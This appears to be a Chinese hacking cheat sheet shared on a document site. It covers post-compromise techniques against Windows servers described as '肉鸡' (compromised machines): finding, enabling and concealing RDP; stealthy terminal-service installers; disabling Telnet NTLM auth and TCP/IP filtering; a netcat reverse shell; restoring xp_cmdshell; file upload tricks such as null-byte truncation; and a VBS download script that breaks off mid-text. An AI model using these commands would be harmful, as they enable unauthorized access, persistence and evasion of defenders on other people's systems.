版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、查看3389端口总结一、导出注册表法regedit /e tsport.reg "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"然后 type tsport.reg | find "PortNumber"结果如果是d3d的话就证明是3389端口如果是其他的 转换成10进制就可以了。二、脚本利用法Dim ReadComputerName Set ReadComputerName=WScript.CreateObject("WScr
2、ipt.Shell") Dim TSName,TSRegPathTSRegPath="HKLMSystemCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumber" TSName=ReadComputerName.RegRead(TSRegPath) WScript.Echo("终端端口为"&TSName)WScript.Echo()WScript.Echo("本程序是帮助你找到终端的端口")WScript.Echo("Pixy&
3、quot;)把以上代码保存为vbs文件,如“3389port.vbs”然后在命令行下运行cscript 3389port.vbs 即可查看终端端口(桌面环境下可直接点击查看)。三、ASP实现法sub get_terminal_port()terminal_port_path="HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"terminal_port_key="PortNumber"termport=wsh.regread(terminal
4、_port_path&terminal_port_key)if termport="" or err.number<>0 thenresponse.write "无法得到终端服务端口。请检查权限是否已经受到限制。<br>"elseresponse.write "当前终端服务端口: "&termport&"<br>"end ifend sub四、利用工具C3389.exe=开启XP And 2003终端的方法xp、2003开终端的方法和2000、nt(ts
5、version)不一样,不是通过安装,因为xp、2003已经自动安装的远程桌面功能,只是启动不启动的问题。通过下面这个批处理就能在命令行下激活xp、2003的远程桌面功能echo windows registry editor version 5.00>>3389.reg echo hkey_local_machinesystemcurrentcontrolsetcontrolterminal server>>3389.reg echo "fdenytsconnections"=dword:00000000>>3389.reg echo
6、hkey_local_machinesystemcurrentcontrolsetcontrolterminal serverwdsrdpwdtdstcp>>3389.reg echo "portnumber"=dword:00000d3d>>3389.reg echo hkey_local_machinesystemcurrentcontrolsetcontrolterminal serverwinstationsrdp-tcp>>3389.reg echo "portnumber"=dword:00000d3d&g
7、t;>3389.reg regedit /s 3389.reg del 3389.reg=修改3389端口方法(修改后不易被扫出)修改服务器端的端口设置,注册表有2个地方需要修改HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWdsrdpwdTdstcp PortNumber值,默认是3389,修改成所希望的端口,比如6000第二个地方:HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-TcpPortNumb
8、er值,默认是3389,修改成所希望的端口,比如6000现在这样就可以了。重启系统就可以了.=打开3389端口的5种方法怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用: 1,打开记事本,编辑内容如下: echo Components > c:sql echo TSEnable = on >> c:sql sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。2 (对xp2000都有效) 脚本文件 本地开3389 工具
9、:rots1.05 使用方法: 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:c:>cscript ROTS.vbs <目标IP> <用户名> <密码> 服务端口 自动重起选项服务端口: 设置终端服务的服务端口。默认是3389。 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。 使用/fr表示强制重起目标。(如果/r不行,可以试试这个) 使用此参数时,端口设置不能忽略。运行CMD(2000下的DOS),我们给它开终端! 命令如下! 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你
10、是否要取消。 因为pro版不能安装终端服务。 如果你确信脚本判断错误,就继续安装好了。脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。3,下载3389自动安装程序-djshao正式版5.0 说明: 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:winnttemp下的任何文件!5、不管肉鸡的winnt装在什么盘上都
11、无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版!安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。 复制启动后出现对方桌面。 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除win
12、dows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK=终端服务器超出了最大允许连接数的解决办法1、首先你可以telnet到此主机上(不管你用哪种方法),当然如果能直接操作机器更好,不过直接操作就不必用命令行了,用控制台更直观,这里不是我们讲述的问题,略过。2、Telnet上去后,先看登陆的用户:输入命令:query user系统返回:USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIMEadministrator console 0 运行中 . 2004-10-09 15:37user1 UserMachine
13、1 1 运行中 . 2004-10-09 15:37user2 12 已断开 无 2004-10-09 15:37此时可以看出的可能根我们的不一样,根据具体情况而定。看到吗? ID 0 的用户是本地登陆的,ID 1 和 ID 12是3389登陆的用户,前者在运行中,后者已经断开了,但是断开了仍然占用系统资源和通道,我们要把它踢掉。如下进行操作即可。输入命令:logoff 12C:>query user /再看看USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIMEadministrator console 0 运行中 . 2004-10-09
14、 15:37user1 UserMachine1 1 运行中 . 2004-10-09 15:37mstsc /console /v:IP:终端端口 T管理=对于Telnet的HTLM身份验证的突破方法总结By:独孤依人SST对于Telnet的HTLM身份验证的突破方法常用以下四种方法:1、新建用户法telnet对方ip,发现需要 NTLM 身份验证。我们在自己的电脑里建立一个要登录的远程帐号和密码都相同的身份为管理员的账户。找到c:winntsystem32cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入刚才新
15、建的帐号和密码,telnet对方ip,直接可以登陆对方电脑了。 这种方法我以前常用的,实用性较强2、命令法那就是直接运行命令:tlntadmn config sec = -ntlm运行以后就去掉了该死的ntlm认证:)3、上传ntml.exe法这种方法有很多缺点,比如:对方有杀毒软件,网段屏蔽了TFTP等等.4、telnet配置信息写入法直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。对于Telnet的HTLM身份验证的突破方法用1或2中方法就可解决!=解除TCP/IP筛选 的方法总结TCP/IP筛选在注册表里有三处,分别是:HKEY_LOCAL_MACHIN
16、ESYSTEMControlSet001ServicesTcpipHKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipHKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip分别用regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpipregedit -e D:b.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipregedit -e D:c.reg
17、 HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip命令来导出注册表项然后把 三个文件里的EnableSecurityFilters"=dword:00000001,改成EnableSecurityFilters"=dword:00000000再将以上三个文件分别用regedit -s D:a.regregedit -s D:b.regregedit -s D:c.reg导入注册表即可附:解除TCP/IP限制的小技巧 1.用NC反弹得到一个shell本机监听 NC -l -p 32WEBSHELL运行:得到一个she
18、ll2.CMD下导出注册表文件C:>regedit -e x:xxx1.reg HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpipC:>regedit -e x:xxx2.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpipC:>regedit -e x:xxx3.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip修改各文件 EnableSecurityFilters 处将最后的1改为03.将注册表文件导入
19、x:xxx>regedit -s 1.regx:xxx>regedit -s 2.regx:xxx>regedit -s 3.reg-S 为无提示重启命令 iisreset /reboot完成TCP/IP筛选限制=xp_cmdshell新的恢复办法xp_cmdshell新的恢复办法扩展储存过程被删除以后可以有很简单的办法恢复:删除drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'恢复dbcc addextendedpr
20、oc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")这样可以直接恢复,不用去管sp_addextendedproc是不是存在-删除扩展存储过过程xp_cmdshell的语句:exec sp_dropextendedproc 'xp_cmdshell'恢复cmdshell的sql语句exec sp_addextendedproc xp_cmdshell ,dllname ='xpl
21、og70.dll'开启cmdshell的sql语句exec sp_addextendedproc xp_cmdshell ,dllname ='xplog70.dll'判断存储扩展是否存在返回结果为1就ok恢复xp_cmdshell返回结果为1就ok堵上cmdshell的sql语句sp_dropextendedproc "xp_cmdshel=文件上传方法汇总文件上传是很早以前的事了,最早那会常用的就是IPC连接,然后一个一个的COPY,自从动网upfile漏洞出来以后,各种脚本系统如PHP.JSP下的文件漏洞纷纷暴出,原理都是大同小异,没有过滤文件上传路径,
22、导致可以抓包然后把空格20改成00,变成空字符NULL,系统是从右往左识别的,所以到空字符那就截断了,更简单的就是过滤文件上传类型不完整,改后缀就可以解决了,这些上传文件的漏洞,用万能上传工具就可以轻松搞定,不过漏洞文件名不同罢了。还有一些另类的文件上传方法,是在系统做了比较好的防范下完成的,资料来源感谢CD-LION提供一。先COPY个winshell.exe吧,开个telnet端口,命令行下总比在浏览器里方便啊.copy myIPc$toolswinshell.exe d:downloadswinzip32 已复制一个文件启动它 d:downloadswinzip32winshell.ex
23、e 浏览器窗口会停好久,不用等的,程序已经启动了,点停止,接着,断开共享连接: net use myIPc$ /del 完成如果ftp被关了,sendmail也不行,如何把编译好的文件上传到主机呢? 方法很简单: 1.先把要上传的文件用uuedcode进行编码,文件会变成大概下面的样子: begin 644 file.bat M.C!J95T92TP,#503U!=:%=E6#5D9%!>,2Q&1D9&1C$L1D9&,2PT<E!>4%J M95T85!9+7M04%28#!*CTP,'500D)04%!049+04"4$E$34
24、-"04Q%04I- M3D-"2D%,24%!14U-3D-"1D5'24=&0T%3D="1T1(0T=02$='2DA#2$9(1$-! M1TI(1$-!1T1'4$=.1TI'3T=(0T%#3T-/0T#3T-/0T!3D%+0T5!07%Q<7$ M"D!%0TA/($&1B*0T062E,"Y"050+T(0SI<0D%45DE2+D-/32O0BO E62*0SI<0D%45DE2+D-/32*1$5,($,Z7$)!5%9)4BY#3TT&
25、quot; end sum -r/size 17903/262 全部都是可见的ASCII字符了2.用TELNET连接到主机后输入 $ cat >a 然后用WINODWS的拷贝/粘贴,把文件粘贴到telnet窗口 按d 在当前目录下产生文件a 3.uudecode a 文件复原,然后chmod即可3脚本是非常好的东西,只要把源码保存到一个文件中就能运行。所以在shell下,用 echo语句直接写到一个文件中,在用相应的解释程序执行就可以啦。这里是一个程序 实例的简化: echo Set xPost = CreateObject("Microsoft.XMLHTTP") >167168.vbs echo xPost.Send() >>167168.vbs echo Set sGet = CreateObject("ADODB.Stream") >>167168.vbs echo sGet.Mode = 3 >>1
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2024年停车场建设与管理合同标的及收费标准
- 大班健康教育教案《拥抱亲情热爱家庭》
- 一年级下册数学教案-第二单元《十几减5、4、3、2》 (2)∣人教新课标
- 一年级下册数学教案-第二单元十几减8、7、6(4)-人教新课标
- 2023-2024学年三年级下学期数学 第五单元第三课时《求简单的经过时间》(学案)
- 二年级下册数学教案-2~6的乘法口诀求商 人教新课标
- 2024年危险废物回收管理合同
- 中班教案:线描画蜗牛
- 2024年合伙事业:简易协议书
- 一年级下册数学教案 2.2 两位数加减一位数 北京版
- 视光门诊运营计划方案
- 护理评估单工具的使用
- 2021年大庆精神铁人精神知识竞赛题库
- 浙江泰隆商业银行员工手册
- 审计技能实训教程(喻竹 第二版) 教案全套 1.1-9.2 业务承接与评价-审计底稿归档
- 徐州市2023-2024学年八年级上学期期末数学试卷(含答案解析)
- 某户外亮化工程冬雨季、夜间施工措施
- 生涯发展报告通用模板
- 大学生职业规划大赛成长赛道模板
- 越人歌音乐分析报告
- 2024年山东黄金集团有限公司招聘笔试参考题库附带答案详解
评论
0/150
提交评论